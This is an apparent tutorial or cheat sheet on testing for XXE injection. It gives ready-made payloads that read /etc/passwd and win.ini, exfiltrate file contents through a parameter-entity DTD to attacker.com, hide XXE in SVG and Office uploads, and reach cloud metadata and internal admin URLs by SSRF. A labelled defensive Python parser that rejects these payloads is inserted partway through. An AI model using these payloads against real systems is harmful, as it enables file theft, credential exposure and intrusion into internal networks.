Learn how to test for XML External Entity (XXE) injection to read local files, perform SSRF, and exfiltrate data via out-of-band channels.
Find endpoints that accept XML data: SOAP APIs, XML-RPC, file uploads (DOCX, XLSX, SVG), and any Content-Type: application/xml or text/xml requests. Check if the server parses XML with DTD processing enabled.
Content-Type: application/xml
Content-Type: text/xml
.docx, .xlsx, .svg file uploads
Define an external entity referencing a local file and include it in the XML body. If the file contents appear in the response, the application is vulnerable to classic XXE.
<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>
<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]><root>&xxe;</root>
If entity contents are not reflected, use out-of-band (OOB) techniques. Define an external entity that makes an HTTP or DNS request to your controlled server to confirm the vulnerability.
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker.com/xxe-test">]>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">%xxe;]>
Use parameter entities to read file contents and exfiltrate them via HTTP. Host a malicious DTD on your server that defines entities to extract and send data.
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://attacker.com/?data=%file;'>">
%eval; %exfiltrate;
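Defender's counterpart to the classic and parameter-entity tests above, as an added example that is not part of this cheat sheet: a Python standard-library (pyexpat) parser gate that refuses any DOCTYPE and any parameter or external entity before anything is resolved, exercised against constructed copies of the payloads. The sample documents and the verdict format are assumptions of the example, not from the page.

```python
import xml.parsers.expat as expat


class XxeRejected(ValueError):
    """Raised from inside an expat handler to abort parsing early."""


def parse_xml_safely(data: bytes) -> str:
    """Parse untrusted XML and return its character data, or raise XxeRejected."""
    parser = expat.ParserCreate()
    # Never expand parameter entities (%xxe;), even if a DTD slips through.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # First layer: no DOCTYPE at all, so no entity can be declared.
        raise XxeRejected("DOCTYPE not allowed (root %r)" % name)

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        # Second layer: block parameter entities and SYSTEM/PUBLIC entities.
        if is_param or sysid is not None or pubid is not None:
            raise XxeRejected("parameter/external entity %r" % name)

    def on_external_ref(context, base, sysid, pubid):
        # Third layer: refuse any fetch of an external resource by the parser.
        raise XxeRejected("external fetch of %r blocked" % sysid)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    chunks = []
    parser.CharacterDataHandler = chunks.append
    parser.Parse(data, True)  # exceptions raised in handlers propagate here
    return "".join(chunks)


def check_document(data: bytes) -> dict:
    """Wrap the parser in a verdict usable by an upload filter or a test."""
    try:
        return {"accepted": True, "text": parse_xml_safely(data), "reason": ""}
    except XxeRejected as exc:
        return {"accepted": False, "text": "", "reason": str(exc)}
    except expat.ExpatError as exc:
        return {"accepted": False, "text": "", "reason": "malformed: %s" % exc}


# Constructed samples: the classic and parameter-entity payloads from the
# steps above, plus a benign document that must still be accepted.
CLASSIC = (b'<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM '
           b'"file:///etc/passwd">]><root>&xxe;</root>')
PARAM = (b'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM '
         b'"http://attacker.com/evil.dtd">%xxe;]><root/>')
BENIGN = b'<?xml version="1.0"?><order><id>42</id></order>'
```

Both payloads are rejected at the DOCTYPE before the entity declaration is even seen, so the file or remote DTD is never touched; the benign order document parses normally.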
Upload crafted SVG, DOCX, or XLSX files containing XXE payloads. Office documents are ZIP archives containing XML files that may be parsed server-side.
<?xml version="1.0"?>
<!-- SVG with XXE -->
<!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<svg>&xxe;</svg>
Alternatively, modify [Content_Types].xml inside the DOCX/XLSX archive.
Use XXE to perform server-side requests to internal services and cloud metadata endpoints, combining XXE impact with SSRF capabilities.
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
<!ENTITY xxe SYSTEM "http://192.168.1.1:8080/admin">